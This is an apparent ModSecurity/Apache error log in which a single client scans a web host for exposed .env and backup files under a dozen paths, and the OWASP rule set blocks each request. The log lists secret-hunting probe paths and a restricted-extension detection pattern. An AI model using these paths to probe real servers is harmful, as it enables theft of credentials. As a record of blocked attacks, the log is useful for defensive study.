[Tue Aug 12 02:35:25.451909 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbgAAAAI"]
[Tue Aug 12 02:35:25.452190 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbgAAAAI"]
[Tue Aug 12 02:35:25.452404 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbgAAAAI"]
[Tue Aug 12 02:35:25.474782 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbwAAAAI"]
[Tue Aug 12 02:35:25.475043 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbwAAAAI"]
[Tue Aug 12 02:35:25.475238 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbwAAAAI"]
[Tue Aug 12 02:35:25.497598 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aJqMTb1qHv1U4ugo3Y_zcAAAAAI"]
[Tue Aug 12 02:35:25.498022 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aJqMTb1qHv1U4ugo3Y_zcAAAAAI"]
[Tue Aug 12 02:35:25.498265 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aJqMTb1qHv1U4ugo3Y_zcAAAAAI"]
[Tue Aug 12 02:35:25.694045 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdQAAAAI"]
[Tue Aug 12 02:35:25.694448 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdQAAAAI"]
[Tue Aug 12 02:35:25.694679 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdQAAAAI"]
[Tue Aug 12 02:35:25.716948 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdgAAAAI"]
[Tue Aug 12 02:35:25.717198 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdgAAAAI"]
[Tue Aug 12 02:35:25.717409 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdgAAAAI"]
[Tue Aug 12 02:35:25.739962 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdwAAAAI"]
[Tue Aug 12 02:35:25.740213 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdwAAAAI"]
[Tue Aug 12 02:35:25.740438 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zdwAAAAI"]
[Tue Aug 12 02:35:25.762733 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zeAAAAAI"]
[Tue Aug 12 02:35:25.762984 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zeAAAAAI"]
[Tue Aug 12 02:35:25.763181 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zeAAAAAI"]
[Tue Aug 12 02:35:25.785940 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zeQAAAAI"]
[Tue Aug 12 02:35:25.786225 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zeQAAAAI"]
[Tue Aug 12 02:35:25.786520 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zeQAAAAI"]
[Tue Aug 12 02:35:25.808913 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zegAAAAI"]
[Tue Aug 12 02:35:25.809177 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zegAAAAI"]
[Tue Aug 12 02:35:25.809432 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zegAAAAI"]
[Tue Aug 12 02:35:25.831800 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zewAAAAI"]
[Tue Aug 12 02:35:25.832049 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zewAAAAI"]
[Tue Aug 12 02:35:25.832255 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zewAAAAI"]
[Tue Aug 12 02:35:25.855014 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfAAAAAI"]
[Tue Aug 12 02:35:25.855365 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfAAAAAI"]
[Tue Aug 12 02:35:25.855608 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfAAAAAI"]
[Tue Aug 12 02:35:25.878035 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfQAAAAI"]
[Tue Aug 12 02:35:25.878279 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfQAAAAI"]
[Tue Aug 12 02:35:25.878502 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfQAAAAI"]
[Tue Aug 12 02:35:25.900895 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfgAAAAI"]
[Tue Aug 12 02:35:25.901166 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfgAAAAI"]
[Tue Aug 12 02:35:25.901370 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfgAAAAI"]
